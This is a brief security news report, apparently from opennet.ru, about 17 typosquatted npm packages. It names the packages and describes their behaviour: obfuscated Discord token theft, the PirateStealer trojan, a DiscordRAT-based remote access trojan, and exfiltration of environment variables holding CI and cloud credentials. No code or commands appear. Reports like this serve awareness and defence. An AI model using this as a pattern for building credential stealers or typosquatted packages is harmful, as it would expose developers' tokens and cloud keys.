The NPM repository identified 17 malicious packages that were distributed using typesquatting, i.e. with the assignment of names similar to the names of popular libraries, with the expectation that the user will make a typo when typing the name or will not notice the differences when choosing a module from the list.
The discord-selfbot-v14, discord-lofy, discordsystem, and discord-vilao packages used a modified version of the legitimate discord.js library, which provides functions for interacting with the Discord API. The malicious components were integrated into one of the package files and included about 4000 lines of code, obfuscated using variable name mangling, string encryption, and code formatting violations. The code scanned the local FS for Discord tokens and, if found, sent them to the attackers' server.
The fix-error package was advertised as fixing bugs in the Discord selfbot, but included the PirateStealer trojan that steals credit card numbers and accounts associated with Discord. The malicious component was activated by substituting JavaScript code into the Discord client.
The prerequests-xcode package included a Trojan for remote access to the user's system, based on the DiscordRAT Python application.
It is speculated that access to the Discord servers may have been required by attackers to deploy botnet control points, as a proxy to download information from hacked systems, obfuscate attacks, distribute malware to Discord users, or resell premium accounts.
The packages wafer-bind, wafer-autocomplete, wafer-beacon, wafer-caas, wafer-toggle, wafer-geolocation, wafer-image, wafer-form, wafer-lightbox, octavius-public and mrg-message-broker included the code to send the contents of environment variables, which, for example, could include access keys, tokens, or passwords to continuous integration systems or cloud environments such as AWS.
Source: opennet.ru